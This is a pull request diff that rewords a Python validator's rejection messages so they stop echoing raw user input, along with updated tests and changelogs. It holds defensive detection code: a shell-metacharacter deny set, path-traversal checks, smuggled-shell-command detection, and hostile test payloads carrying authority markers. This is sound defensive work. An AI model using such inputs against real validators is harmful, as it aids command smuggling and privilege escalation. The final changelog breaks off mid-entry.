### PR TITLE
fix(foundups): #807 authority scanner errors never echo raw user input (Phase 1 hygiene)

### DIFF
--- a/ModLog.md
+++ b/ModLog.md
@@ -1,5 +1,46 @@
 # FoundUps Agent - Development Log
 
+## [2026-06-18] Kanban Contract #807 Authority-Scanner No-Raw-Echo Phase 1 (AUTHOR, completes the #830 deferral)
+
+**Change Type**: MESSAGE-ONLY HARDENING -- 1 src file (`modules/foundups/agent/src/kanban_plugin_contract.py`)
++ its tests + 2 cross-package ai_overseer test suites. The #830 launch_request slice DEFERRED the imported
+#807 authority scanner `_scan_authority`, whose error messages echoed raw user-controlled keys / values /
+`repr()` / nested trail. `kanban_plugin_contract.py` is the #807 AUTHORITY BOUNDARY shared by
+`validate_launch_request` AND `validate_card_spec` / `validate_worker_task_spec` /
+`validate_evidence_packet`. Closed: no validation error in that module echoes the raw key, value, `repr()`,
+nested trail, or raw bytes -- each names the rule (+ the fixed `_AUTHORITY_MARKERS` class token `{m}`/`{carried}`,
+which is taxonomy, NOT user input). MESSAGE TEXT ONLY -- the authority-detection LOGIC is byte-identical.
+**By**: 0102 (AUTHOR) | Commander: 012 | Gate: independent 5-lane SENTINEL (do NOT self-merge)
+**WSP References**: WSP 00, 22, 50, 64, 84, 87, 97
+**Slice**: FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1
+**Base**: `edbd90642` (origin/main; contains #810/#821/#823/#824/#826/#830)
+**Motivating finding**: #830 explicitly DEFERRED the `_scan_authority` echo sites.
+
+**Sites reworded (kanban_plugin_contract.py)**: `_scan_authority` (8 sites: non-string key, non-printable
+key, verified=true, source_authority promotion, promotion flag, forbidden-authority-field-by-presence
+[KEEP `{m}`], shell-string command, value-carried-authority [KEEP `{carried}`]); `_check_path` (5 sites:
+dropped `{value!r}` and the offending-char list); `validate_card_spec` (1 site: dropped raw `risk_class`).
+The nested `trail` is still computed for recursion descent but NEVER interpolated into a message.
+
+**Parity proof (logic byte-identical)**: (1) AST control-flow skeleton with every string literal AND every
+f-string uniformly blanked -> SHA-256 equals the frozen origin/main baseline (SELF-CONTAINED, no runtime
+`git show`, per the #830 shallow-CI lesson); (2) a NAMED-category authority battery (~42 fixtures: the #807
+corpus incl. ~13 normalized evasions and ~10 authority-by-value) where each fixture's expected violation
+class is mapped BY INPUT DESIGN, never message-derived, so a weakened detector fails even though the message
+text changed.
+
+**Downstream**: `launch_request.py` SOURCE unchanged (imports `_scan_authority`, behavior unchanged). Added a
+`test_intake_transport.py` caller-regression (real `SQLiteNonceStore` + spy): authority-bearing payload ->
+rejected, `IntakeResult.reason == "invalid_request"` (low-cardinality, no auth oracle), no raw
+key/value/trail in result/repr/serialized, valid single-use invite NOT consumed. `validate_card_spec` /
+`validate_worker_task_spec` / `validate_evidence_packet` reject the same inputs (outcome-only). Updated 4
+`test_foundup_launch_request.py` assertions/helpers that pinned the #830-DEFERRED old echo text (text-only).
+
+**Tests**: kanban contract suite 135 passed (+64); full agent suite 832 passed (heavy + CI); launch-intake
+affected packages 592 passed (heavy + CI); intake_transport 188 passed. No skip/xfail. All 4 edited files
+byte-checked ASCII-clean (0 non-ASCII). Scope-guard SOURCE files (launch_request.py / intake_*.py /
+validator.py / envelope.py) confirmed UNCHANGED (empty diff).
+
 ## [2026-06-17] FoundUp Launch-Request Error No-Raw-Echo Phase 1 (AUTHOR, public-intake validator error-message hygiene)
 
 **Change Type**: MESSAGE-ONLY HARDENING -- 1 src validator + 2 test suites. The #826 sweep hardened the

--- a/modules/ai_intelligence/ai_overseer/tests/test_foundup_launch_request.py
+++ b/modules/ai_intelligence/ai_overseer/tests/test_foundup_launch_request.py
@@ -549,7 +549,7 @@ def test_reference_metachars_not_echoed():
         e == "reference_urls[0] contains shell/code metacharacters" for e in res.errors
     ), f"expected safe metachar message with index locality; got {res.errors}"
     # No metachar list, no raw URL, no offending chars in ANY launch_request-local error.
-    local = [e for e in res.errors if "carries authority" not in e]  # exclude #807 (deferred)
+    local = _launch_request_local_errors(res.errors)  # exclude IMPORTED #807 lines
     for e in local:
         assert _HOSTILE_METACHAR_URL not in e
         assert "sorted(" not in e
@@ -577,14 +577,14 @@ def test_intake_gate_message_is_safe():
 
 def _launch_request_local_errors(errors):
     """Drop errors that originate in the IMPORTED #807 _scan_authority (kanban_plugin_
-    contract.py). Those are DEFERRED to FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1
-    (Addendum E) and are NOT this slice's local sites. We identify them by their stable
-    #807 message stems."""
+    contract.py), leaving only launch_request-LOCAL sites. The #807 no-raw-echo fix LANDED
+    (FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1), so these stems now match the SAFE
+    rule-only messages (the fixed marker class is retained as taxonomy)."""
     _807_STEMS = (
-        "value carries authority",
-        "is a source_authority promotion",
-        "forbidden authority field",
-        "non-string key",
+        "value carries a forbidden authority marker",
+        "source_authority promotion is forbidden",
+        "forbidden authority field present",
+        "non-string key rejected",
         "non-ASCII / non-printable key",
         "verified=true is forbidden",
         "promotion flag is forbidden",
@@ -651,54 +651,58 @@ def test_launchrequesterror_unknown_field_key_not_echoed():
 
 # --- ADDENDUM E: #807 _scan_authority echo is DEFERRED, not modified ---------
 
-def test_807_scan_authority_echo_is_documented_and_deferred():
-    """ADDENDUM E: the IMPORTED #807 _scan_authority (kanban_plugin_contract.py) DOES echo
-    raw user input (key/value/repr) for authority-class rejections reachable from
-    validate_launch_request. This slice does NOT modify #807; it records the behavior and
-    names the follow-up FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1. This test PINS the
-    deferred behavior so a future change to #807 is noticed. It also confirms the
-    launch_request-LOCAL errors for the SAME payload are themselves safe."""
+def test_807_scan_authority_no_raw_echo_after_deferral_landed():
+    """The IMPORTED #807 _scan_authority (kanban_plugin_contract.py) authority-class echo was
+    DEFERRED by the #830 launch_request slice; FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1
+    has now LANDED that fix. The source_authority-promotion rejection is still produced (outcome
+    unchanged) but the message is now the SAFE rule-only phrasing -- no raw value/key/trail.
+    The raw promotion value ('external_proto') must NOT appear in ANY error."""
     payload = {"proposed_name": "X", "category": "marketplace", "source_authority": "external_proto"}
     res = validate_launch_request(dict(payload), _authed())
     assert not res.ok
-    # The #807 echo IS present (documented deferral, not a regression of THIS slice).
-    assert any("is a source_authority promotion" in e and "external_proto" in e for e in res.errors), \
-        "expected the documented #807 echo; if absent, #807 was changed -- update the deferral note"
-    # The launch_request-LOCAL errors (everything except the #807 line) are leak-free.
-    local = _launch_request_local_errors(res.errors)
-    _all_errors_leak_free(local, "source_authority")
+    # The #807 rejection still fires, now with the SAFE rule-only message (no raw value).
+    assert any(e == "source_authority promotion is forbidden (only monorepo_poc)" for e in res.errors), \
+        "expected the safe #807 rule-only message after the no-raw-echo fix landed"
+    # No raw promotion value leaks from ANY error (the old echo carried 'external_proto').
+    for e in res.errors:
+        assert "external_proto" not in e
 
 
 def test_807_non_ascii_key_echo_is_documented_and_deferred():
-    """ADDENDUM E: a control/bidi-decorated KEY trips the IMPORTED #807 non-ASCII-key echo
-    (kanban_plugin_contract.py 'non-ASCII / non-printable key rejected'), which echoes the
-    raw key. DEFERRED, not modified. The launch_request-LOCAL allowed-fields message for the
-    SAME key is still safe (the class name, never the key)."""
+    """A control/bidi-decorated KEY trips the IMPORTED #807 non-printable-key rejection
+    (kanban_plugin_contract.py 'non-ASCII / non-printable key rejected'). After the no-raw-echo
+    fix LANDED, this message is the SAFE rule-only phrasing -- the raw key is NOT echoed by it
+    OR by the launch_request-LOCAL allowed-fields message (the class name, never the key)."""
     payload = {"proposed_name": "X", "category": "marketplace", _HOSTILE_FIELD_KEY_CTRL: "v"}
     res = validate_launch_request(dict(payload), _authed())
     assert not res.ok
-    # Documented #807 echo present (the deferred site).
-    assert any("non-ASCII / non-printable key rejected" in e for e in res.errors), \
-        "expected the documented #807 non-ASCII-key echo; if absent, #807 was changed"
+    # Safe #807 rule-only message present, EXACTLY (no raw key/trail prefix any more).
+    assert any(e == "non-ASCII / non-printable key rejected" for e in res.errors), \
+        "expected the safe #807 non-printable-key message after the no-raw-echo fix landed"
     # Launch-LOCAL message for this key is the safe class name (no raw key).
     assert any(e == "payload contains a forbidden or unknown field" for e in res.errors)
-    local = _launch_request_local_errors(res.errors)
-    _all_errors_leak_free(local, _HOSTILE_FIELD_KEY_CTRL)
+    # The raw key leaks from NO error -- not the #807 line, not the launch-local line.
+    _all_errors_leak_free(res.errors, _HOSTILE_FIELD_KEY_CTRL)
 
 
-def test_807_module_not_modified_by_this_slice():
-    """ADDENDUM E: this slice changes only launch_request.py. The #807 contract source is
-    untouched -- its known raw-echo lines are still present verbatim (proves no silent
-    expansion of scope into kanban_plugin_contract.py)."""
+def test_807_module_no_longer_carries_raw_echo_lines():
+    """The #807 no-raw-echo fix (FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1) has LANDED:
+    the DEFERRED raw-echo lines that interpolated the user key/value/trail are GONE from
+    kanban_plugin_contract.py, replaced by SAFE rule-only messages (the fixed marker class is
+    retained as taxonomy). This pins the completed invariant from the launch_request side."""
     contract = (
         Path(__file__).resolve().parents[3]
         / "foundups" / "agent" / "src" / "kanban_plugin_contract.py"
     )
     src = contract.read_text(encoding="utf-8")
-    # These raw-echo lines are the DEFERRED #807 sites; they must still be present (unchanged).
-    assert "is a source_authority promotion (only monorepo_poc)" in src
-    assert "value carries authority" in src
-    assert "non-string key" in src
+    # The OLD raw-echo f-string fragments must be ABSENT (no {trail}/{key}/{value}/{node!r}).
+    assert "is a source_authority promotion (only monorepo_poc)" not in src  # old: f"...'{value}'..."
+    assert "value carries authority '" not in src                            # old: f"...'{carried}': {node!r}"
+    assert "non-string key {" not in src                                     # old: f"...{key!r}"
+    # The SAFE rule-only replacements ARE present (class kept for the marker taxonomy).
+    assert "source_authority promotion is forbidden (only monorepo_poc)" in src
+    assert "value carries a forbidden authority marker (class: " in src
+    assert "non-string key rejected" in src
 
 
 # ===========================================================================
@@ -741,8 +745,9 @@ def _categorize(err: str) -> str:
         return "display_type"
     if "contains disallowed control/format character" in e:
         return "display_control_char"
-    if ("carries authority" in e or "source_authority promotion" in e or "forbidden authority field" in e
-            or "non-string key" in e or "non-ASCII / non-printable key" in e or "verified=true is forbidden" in e
+    if ("value carries a forbidden authority marker" in e or "source_authority promotion is forbidden" in e
+            or "forbidden authority field present" in e or "non-string key rejected" in e
+            or "non-ASCII / non-printable key" in e or "verified=true is forbidden" in e
             or "promotion flag is forbidden" in e or "shell-string command is forbidden" in e):
         return "authority_807"
     return "UNCLASSIFIED::" + e

--- a/modules/ai_intelligence/ai_overseer/tests/test_intake_transport.py
+++ b/modules/ai_intelligence/ai_overseer/tests/test_intake_transport.py
@@ -1314,3 +1314,86 @@ def test_valid_invite_not_consumed_by_each_hostile_class(label, field, value):
     )
     assert r_good.status == "created", label
     assert r_good.envelope["requested_by"] == "bob", label
+
+
+# ===========================================================================
+# FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1 -- ADDENDUM C DOWNSTREAM RECHECK.
+#
+# launch_request imports the #807 _scan_authority from kanban_plugin_contract.py, which the
+# transport runs as its PRE-PROVIDER body preflight. After the kanban scanner's MESSAGE
+# rewrite, an authority-bearing body must STILL: (a) be rejected, (b) collapse to the generic
+# low-cardinality reason invalid_request (no auth oracle), (c) leak NO raw key/value/trail/
+# repr/control-byte into the result/repr/serialized dict, and (d) NOT consume a valid
+# single-use invite (real SQLiteNonceStore + spy provider). Hostile fixtures are source-ASCII.
+# ===========================================================================
+
+
+def test_kanban807_authority_body_low_cardinality_and_no_raw_echo():
+    """Authority-bearing body via the IMPORTED #807 scanner -> generic invalid_request and
+    NO raw key/value/trail/repr/control-byte in the transport result (Addendum C)."""
+    leak_val = "z9LEAKvalueZ9"
+    body = _clean_body_dict()
+    # A clean ALLOWED field carrying a #807 authority marker VALUE -> _scan_authority
+    # (value-carries-authority path). The raw value must NOT surface anywhere.
+    body["problem_statement"] = "please " + leak_val + " create_repo right now"
+    r = _call(headers={"Authorization": f"Bearer {_session_token()}"},
+              body=json.dumps(body).encode("utf-8"))
+    assert r.status == "rejected"
+    assert r.reason == "invalid_request"  # low-cardinality; no auth oracle
+    blob = _result_blob(r)
+    # No raw value, no #807 scanner phrasing, no marker class token reaches the result.
+    assert leak_val not in blob
+    assert "create_repo" not in blob
+    assert "value carries a forbidden authority marker" not in blob
+    assert "class:" not in blob
+
+
+def test_kanban807_authority_key_body_low_cardinality_no_echo():
+    # A forbidden authority KEY (presence) carrying a leak marker also collapses to the
+    # generic reason; neither the marker class nor the user key reaches the result.
+    body = _clean_body_dict()
+    # category is an allowed field whose VALUE normalizes to contain the gate_passed marker,
+    # so the #807 scanner's value-authority path runs end-to-end with a user-controlled token.
+    body["category"] = "gate_passed_z9LEAKkeyZ9"
+    r = _call(headers={"Authorization": f"Bearer {_session_token()}"},
+              body=json.dumps(body).encode("utf-8"))
+    assert r.status == "rejected"
+    assert r.reason == "invalid_request"
+    blob = _result_blob(r)
+    assert "z9LEAKkeyZ9" not in blob
+    assert "forbidden authority field present" not in blob
+    assert "gate_passed" not in blob
+
+
+def test_kanban807_authority_body_does_not_consume_valid_invite_sqlite_spy():
+    """ADDENDUM C: a VALID invite + an authority-bearing body (rejected by the IMPORTED #807
+    scanner pre-provider) must NOT consume the single-use invite. Proven with a spy provider
+    (zero calls) AND a REAL SQLiteNonceStore (the nonce is still claimable afterward)."""
+    store = SQLiteNonceStore()
+    try:
+        spy = SpyProvider()
+        tok = _invite_token(nonce="kanban807-authority-preserve")
+        leak_val = "z9LEAKvalueZ9"
+        bad = _clean_body_dict()
+        bad["problem_statement"] = "set " + leak_val + " merge_token please"  # #807 value-authority
+        r_bad = intake_request(
+            {"X-FoundUp-Invite": tok}, json.dumps(bad).encode("utf-8"),
+            nonce_store=store, now=_now(), secret_provider=_provider(), _provider=spy,
+        )
+        assert r_bad.status == "rejected"
+        assert r_bad.reason == "invalid_request"
+        assert spy.calls == []  # provider never called -> single-use invite never offered
+        blob = _result_blob(r_bad)
+        assert leak_val not in blob
+        assert "merge_token" not in blob
+        assert "value carries a forbidden authority marker" not in blob
+
+        # The invite SURVIVES: a later VALID request consumes it exactly once -> created.
+        r_good = intake_request(
+            {"X-FoundUp-Invite": tok}, _clean_body_bytes(),
+            nonce_store=store, now=_now(), secret_provider=_provider(),
+        )
+        assert r_good.status == "created"
+        assert r_good.envelope["requested_by"] == "bob"
+    finally:
+        store.close()

--- a/modules/foundups/agent/ModLog.md
+++ b/modules/foundups/agent/ModLog.md
@@ -1,5 +1,97 @@
 # Agent Module ModLog
 
+## 2026-06-18 - Kanban Plugin Contract no-raw-echo for the #807 authority scanner (FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1)
+
+**Author**: 0102 (AUTHOR worker) | Commander: 012
+**WSP References**: WSP 22, WSP 50, WSP 84, WSP 97
+**Base**: `edbd90642` (origin/main; contains #810/#821/#823/#824/#826/#830)
+**Predecessor**: #830 launch_request slice DEFERRED the imported #807 authority-scanner echo.
+
+### Why
+
+The #830 launch_request no-raw-echo slice DEFERRED `kanban_plugin_contract.py::_scan_authority`
+(the #807 AUTHORITY BOUNDARY shared by `validate_launch_request` AND `validate_card_spec` /
+`validate_worker_task_spec` / `validate_evidence_packet`). Its error messages echoed raw
+user-controlled keys / values / `repr()` / nested trail. This slice COMPLETES the no-raw-echo
+invariant for the authority-scan path. MESSAGE TEXT ONLY -- the authority-detection LOGIC is
+byte-identical (proven mechanically).
+
+### Changed (message text only -- error sites in kanban_plugin_contract.py)
+
+`_scan_authority` (the #807 boundary):
+- non-string key: `f"{trail}: non-string key {key!r}"` -> `"non-string key rejected"`
+- non-printable key: `f"{trail}{key}: non-ASCII / non-printable key rejected"` -> `"non-ASCII / non-printable key rejected"`
+- verified=true: `f"{trail}{key}: verified=true is forbidden ..."` -> `"verified=true is forbidden (advisory-until-verified)"`
+- source_authority promotion: `f"{trail}{key}: '{value}' is a source_authority promotion ..."` -> `"source_authority promotion is forbidden (only monorepo_poc)"`
+- promotion flag: `f"{trail}{key}: promotion flag is forbidden"` -> `"promotion flag is forbidden"`
+- forbidden authority field (KEY presence): `f"{trail}{key}: forbidden authority field '{m}' (presence)"` -> `f"forbidden authority field present (class: {m})"` (KEEP `{m}`, DROP `{trail}{key}`)
+- shell-string command: `f"{trail}{key}: shell-string command is forbidden ..."` -> `"shell-string command is forbidden (argv-or-null only)"`
+- value-carried authority: `f"{trail}: value carries authority '{carried}': {node!r}"` -> `f"value carries a forbidden authority marker (class: {carried})"` (KEEP `{carried}`, DROP `{trail}`+`{node!r}`)
+
+`_check_path` (drop raw `value!r` and the offending char list, keep the fixed field label + rule):
+- `path/ref must be printable ASCII: {value!r}` -> `path/ref must be printable ASCII`
+- `absolute/UNC path forbidden: {value!r}` -> `absolute/UNC path forbidden`
+- `drive path forbidden: {value!r}` -> `drive path forbidden`
+- `path traversal '..' forbidden: {value!r}` -> `path traversal '..' forbidden`
+- `shell metacharacters in path/ref: {sorted(bad)}` -> `shell metacharacters in path/ref forbidden`
+
+`validate_card_spec`:
+- `risk_class '{data.get('risk_class')}' not in {...}` -> `risk_class not in allowed set {sorted(ALLOWED_RISK_CLASSES)}` (drop raw value; keep fixed allowed-set taxonomy)
+
+The fixed `{m}` / `{carried}` tokens come from the `_AUTHORITY_MARKERS` taxonomy (NOT user input) and
+are RETAINED (Addendum-B message locality). The user-controlled nested `trail` is still computed for
+recursion descent but is NEVER interpolated into a message.
+
+### Authority-detection parity proof (logic byte-identical)
+
+1. AST control-flow SKELETON parity: every string literal AND every f-string (`JoinedStr`) is
+   uniformly blanked, so an f-string -> plain-string message rewrite is invisible; ANY branch /
+   condition / call / marker-set change would change the hash. The blanked skeleton SHA-256 of the
+   current file equals the frozen origin/main baseline (`f2ee0e26...`). SELF-CONTAINED -- no
+   `git show` at runtime (the #830 shallow-CI lesson).
+2. NAMED-category authority battery (Addendum A): ~42 fixtures across the #807 corpus
+   (forbidden-authority keys by PRESENCE, ~13 normalized evasions incl. camelCase/separator/UPPER/
+   fullwidth, ~10 authority-by-value, source_authority promotion, verified=true nested,
+   shell-command keys, non-string/non-ASCII keys). Each fixture is mapped to its expected violation
+   CLASS by INPUT DESIGN; the battery asserts rejection WITHOUT parsing the human-readable message
+   (a weakened detector fails even though the message text changed).
+3. No-raw-echo battery: seeds sentinel leak tokens into keys, nested trails, values, and paths;
+   asserts no raw content / repr / control-byte appears in any produced message.
+
+### Downstream
+
+- `validate_launch_request` (#810) imports `_scan_authority`; its SOURCE is UNCHANGED. The #823
+  intake_transport caller-regression (real `SQLiteNonceStore` + spy) confirms an authority-bearing
+  payload is rejected, `IntakeResult.reason == "invalid_request"` (low-cardinality, no auth oracle),
+  no raw key/value/trail leaks into the result/repr/serialized dict, and a valid single-use invite
+  is NOT consumed. `validate_card_spec` / `validate_worker_task_spec` / `validate_evidence_packet`
+  still reject exactly the same inputs (outcome-only assertions; only error TEXT changed).
+- Two `test_foundup_launch_request.py` tests that pinned the #830-DEFERRED old #807 echo text were
+  updated (text-only; outcome assertions kept) to pin the now-LANDED safe rule-only messages.
+
+### WSP_97 Truth Boundary Checklist
+
+| # | Truth Boundary Checklist Item | Status | Evidence |
+|---|-------------------------------|--------|----------|
+| 1 | SCAN_AUTHORITY_ERRORS_NEVER_ECHO_RAW_KEY_VALUE_TRAIL | YES | `_scan_authority` 8 sites reworded; no-raw-echo battery seeds leak tokens into key/trail/value -> 0 leaks |
+| 2 | AUTHORITY_MARKER_CLASS_KEPT_RAW_DROPPED | YES | `forbidden authority field present (class: {m})` + `value carries a forbidden authority marker (class: {carried})`; `test_marker_class_token_is_taxonomy_not_user_input` |
+| 3 | AUTHORITY_DETECTION_LOGIC_BYTE_IDENTICAL | YES | AST skeleton SHA-256 == frozen origin/main baseline `f2ee0e26...`; NAMED-category battery rejects all fixtures |
+| 4 | FULL_AUTHORITY_AND_EVASION_BATTERY_PARITY | YES | ~42-fixture battery: presence keys, ~13 normalized evasions, ~10 by-value, source_authority/verified/promotion/shell/non-string/non-ASCII |
+| 5 | ERROR_CATEGORY_BASELINE_NOT_MESSAGE_DERIVED | YES | category mapped by INPUT DESIGN (`_AUTHORITY_BATTERY`); pass/fail = rejection, never message parse |
+| 6 | SAFE_MESSAGE_LOCALITY_PRESERVED | YES | `test_safe_message_locality_preserved` asserts distinct rule families, not one bland phrase |
+| 7 | DOWNSTREAM_VALIDATORS_OUTCOME_UNCHANGED | YES | `test_downstream_validators_reject_authority_payloads` + clean-shape accept (outcome-only) |
+| 8 | LAUNCH_REQUEST_SOURCE_UNCHANGED | YES | `git diff` launch_request.py empty; only its imported `_scan_authority` messages changed |
+| 9 | TRANSPORT_LOW_CARDINALITY_RECHECKED | YES | `test_kanban807_authority_body_low_cardinality_and_no_raw_echo`: reason == invalid_request, no leak |
+| 10 | VALID_INVITE_NOT_CONSUMED_BY_AUTHORITY_PAYLOAD | YES | `test_kanban807_authority_body_does_not_consume_valid_invite_sqlite_spy` (real SQLiteNonceStore + spy) |
+| 11 | AST_SKELETON_PARITY_SELF_CONTAINED_NO_GIT | YES | `test_authority_logic_skeleton_matches_origin_baseline` uses frozen hash, no runtime `git show` |
+| 12 | NESTED_TRAIL_NOT_ECHOED | YES | trail computed for descent only; never interpolated; battery seeds `_LEAK_TRAIL` -> 0 leaks |
+| 13 | REPR_VALUE_NOT_ECHOED | YES | all `{value!r}`/`{node!r}`/`{key!r}` removed; `_assert_no_leak` checks `repr(n) not in blob` |
+| 14 | CONTROL_BYTES_NOT_IN_ERRORS | YES | `_assert_no_leak` asserts no `ord(c) < 32 or == 127` in any produced error |
+| 15 | NO_OTHER_807_SLICE_DRIFT | YES | `git status` shows only kanban_plugin_contract.py + 3 test files; scope-guard sources empty diff |
+| 16 | ASCII_CLEAN | YES | byte-check 0 non-ASCII on all 4 edited files; fixtures via `chr()`/`\uXXXX` |
+| 17 | NO_SKIP_XFAIL | YES | grep: no `pytest.skip`/`xfail`/`skipif` in edits; all suites fully run |
+| 18 | FILE_SCOPE_EXACT | YES | kanban_plugin_contract.py + test_kanban_plugin_contract.py + test_intake_transport.py + test_foundup_launch_request.py |
+
 ## 2026-06-13 - Kanban Plugin Contract (WRE-side typed seam) (HERMES_KANBAN_PLUGIN_CONTRACT_IMPL_PHASE1)
 
 **Author**: 0102 (Worker-Lane A) | Commander: 012

--- a/modules/foundups/agent/src/kanban_plugin_contract.py
+++ b/modules/foundups/agent/src/kanban_plugin_contract.py
@@ -196,31 +196,35 @@ def _scan_authority(node: Any, trail: str, errors: List[str]) -> None:
     if isinstance(node, dict):
         for key, value in node.items():
             if not isinstance(key, str):
-                errors.append(f"{trail}: non-string key {key!r}")
+                # No-raw-echo (#807): never echo the raw key/value/repr/trail. Name the
+                # rule only; the offending key/value are user-controlled.
+                errors.append("non-string key rejected")
                 continue
             if not _is_printable_ascii(unicodedata.normalize("NFKC", key)):
-                errors.append(f"{trail}{key}: non-ASCII / non-printable key rejected")
+                errors.append("non-ASCII / non-printable key rejected")
             nkey = _normalize(key)
             # verified=true anywhere is rejected (advisory-until-verified).
             if nkey == "verified" and _truthy(value):
-                errors.append(f"{trail}{key}: verified=true is forbidden (advisory-until-verified)")
+                errors.append("verified=true is forbidden (advisory-until-verified)")
             # source_authority promotion.
             if nkey in ("source_authority", "lifecycle_stage", "source_authority_stage"):
                 if isinstance(value, str) and _normalize(value) not in ("monorepo_poc", "incubating", "idea", ""):
-                    errors.append(f"{trail}{key}: '{value}' is a source_authority promotion (only monorepo_poc)")
+                    errors.append("source_authority promotion is forbidden (only monorepo_poc)")
             if "promote" in nkey or "promotion" in nkey:
                 if _truthy(value):
-                    errors.append(f"{trail}{key}: promotion flag is forbidden")
+                    errors.append("promotion flag is forbidden")
             # authority-marker key: PRESENCE is forbidden (no legitimate field
-            # normalizes to an authority marker), regardless of value.
+            # normalizes to an authority marker), regardless of value. KEEP the fixed
+            # marker class {m} (from _AUTHORITY_MARKERS taxonomy -- NOT user input);
+            # DROP the user-controlled key/trail.
             for m in _AUTHORITY_MARKERS:
                 if m in nkey:
-                    errors.append(f"{trail}{key}: forbidden authority field '{m}' (presence)")
+                    errors.append(f"forbidden authority field present (class: {m})")
                     break
             # smuggled shell command.
             if any(c in nkey for c in _COMMAND_KEY_MARKERS) and isinstance(value, str):
                 if _has_shell(value):
-                    errors.append(f"{trail}{key}: shell-string command is forbidden (argv-or-null only)")
+                    errors.append("shell-string command is forbidden (argv-or-null only)")
             _scan_authority(value, f"{trail}{key}.", errors)
     elif isinstance(node, (list, tuple, set)):
         for idx, item in enumerate(node):
@@ -228,7 +232,9 @@ def _scan_authority(node: Any, trail: str, errors: List[str]) -> None:
     elif isinstance(node, str):
         carried = _value_carries_authority(node)
         if carried:
-            errors.append(f"{trail}: value carries authority '{carried}': {node!r}")
+            # KEEP the fixed carried-marker class {carried} (taxonomy, NOT user input);
+            # DROP the user-controlled value repr and the trail.
+            errors.append(f"value carries a forbidden authority marker (class: {carried})")
 
 
 def _has_shell(value: str) -> bool:
@@ -245,6 +251,10 @@ _DRIVE = re.compile(r"^[A-Za-z]:")
 
 
 def _check_path(field_name: str, value: Any, errors: List[str]) -> None:
+    # No-raw-echo (#807): field_name is a FIXED contract field label + positional index
+    # (not user content) and the type name is a fixed Python type -- both safe to keep.
+    # The user-controlled path/ref VALUE (and any raw bytes it carries) is NEVER echoed:
+    # name the field + the rule only, never repr(value) or the offending characters.
     if not isinstance(value, str):
         errors.append(f"{field_name}: path/ref must be a string, got {type(value).__name__}")
         return
@@ -252,22 +262,22 @@ def _check_path(field_name: str, value: Any, errors: List[str]) -> None:
         errors.append(f"{field_name}: empty path/ref")
         return
     if not _is_printable_ascii(value):
-        errors.append(f"{field_name}: path/ref must be printable ASCII: {value!r}")
+        errors.append(f"{field_name}: path/ref must be printable ASCII")
         return
     if _has_control_chars(value):
         errors.append(f"{field_name}: control character in path/ref")
         return
     if value.startswith("/") or value.startswith("\\") or value.startswith("//") or value.startswith("\\\\"):
-        errors.append(f"{field_name}: absolute/UNC path forbidden: {value!r}")
+        errors.append(f"{field_name}: absolute/UNC path forbidden")
     if _DRIVE.match(value):
-        errors.append(f"{field_name}: drive path forbidden: {value!r}")
+        errors.append(f"{field_name}: drive path forbidden")
     norm_sep = value.replace("\\", "/")
     if ".." in norm_sep.split("/"):
-        errors.append(f"{field_name}: path traversal '..' forbidden: {value!r}")
+        errors.append(f"{field_name}: path traversal '..' forbidden")
     # shell-control metacharacters (glob '*'/'?'/'[]' and '/' are allowed in path fields).
     bad = set(";|&$`><(){}\n\r\t!#") & set(value)
     if bad:
-        errors.append(f"{field_name}: shell metacharacters in path/ref: {sorted(bad)}")
+        errors.append(f"{field_name}: shell metacharacters in path/ref forbidden")
 
 
 # ---------------------------------------------------------------------------
@@ -421,7 +431,9 @@ def validate_card_spec(obj: Union[KanbanCardSpec, Dict[str, Any]]) -> ContractVa
     res = _validate_common(obj, ("allowed_paths", "forbidden_paths", "worktree", "expected_evidence"))
     data = _as_dict(obj)
     if data.get("risk_class") not in ALLOWED_RISK_CLASSES:
-        res.errors.append(f"risk_class '{data.get('risk_class')}' not in {sorted(ALLOWED_RISK_CLASSES)}")
+        # No-raw-echo (#807): the supplied risk_class is user-controlled -- name the rule and
+        # the fixed allowed set (taxonomy, NOT user input), never the rejected value.
+        res.errors.append(f"risk_class not in allowed set {sorted(ALLOWED_RISK_CLASSES)}")
     for req in ("slice_id", "contextbundle_id", "lane"):
         if not data.get(req):
             res.errors.append(f"{req} missing or empty")

--- a/modules/foundups/agent/tests/TestModLog.md
+++ b/modules/foundups/agent/tests/TestModLog.md
@@ -1,5 +1,45 @@
 # Agent Module TestModLog
 
+## 2026-06-18 - Kanban Contract no-raw-echo + authority-parity tests (FOUNDUP_KANBAN_CONTRACT_ERROR_NO_RAW_ECHO_PHASE1)
+
+**Commands**:
+
+```bash
+python -m pytest modules/foundups/agent/tests/test_kanban_plugin_contract.py -q
+python -m pytest modules/foundups/agent -q                         # full agent suite
+# launch-intake affected packages (both modes):
+AI_OVERSEER_HEAVY_TESTS=1 python -m pytest modules/ai_intelligence/ai_overseer/tests/test_foundup_launch_request.py \
+  modules/ai_intelligence/ai_overseer/tests/test_foundup_genesis_validator.py \
+  modules/ai_intelligence/ai_overseer/tests/test_intake_auth_provider.py \
+  modules/ai_intelligence/ai_overseer/tests/test_intake_transport.py -q
+```
+
+**Result**: PASS
+
+**Summary**:
+- `test_kanban_plugin_contract.py`: 135 passed (was 71; +64 new). Full agent suite: 832 passed
+  (heavy and CI mode), no regression.
+- launch-intake affected packages: 592 passed (heavy and CI mode). intake_transport alone: 188 passed.
+
+**New coverage (this slice)**:
+1. No-raw-echo scanner battery: every `_scan_authority` + `_check_path` + `validate_card_spec`
+   rejection names the rule (+ fixed marker class) and NEVER echoes the raw key/value/repr/nested
+   trail or a control byte. Sentinel leak tokens seeded into keys, trails, values, paths.
+2. Addendum-A NAMED-category authority-detection parity: ~42 fixtures across the #807 corpus, each
+   mapped to its expected violation class BY INPUT DESIGN (never message-derived); asserts rejection
+   so a weakened detector fails even though the message text changed. Plus a coverage test that every
+   named category appears in the battery.
+3. Addendum-B message-locality: distinct safe rule families are present (not collapsed to one bland
+   phrase) and the `{m}`/`{carried}` class token is from the fixed `_AUTHORITY_MARKERS` taxonomy.
+4. AST-skeleton self-contained backstop: blanked control-flow skeleton SHA-256 == frozen origin/main
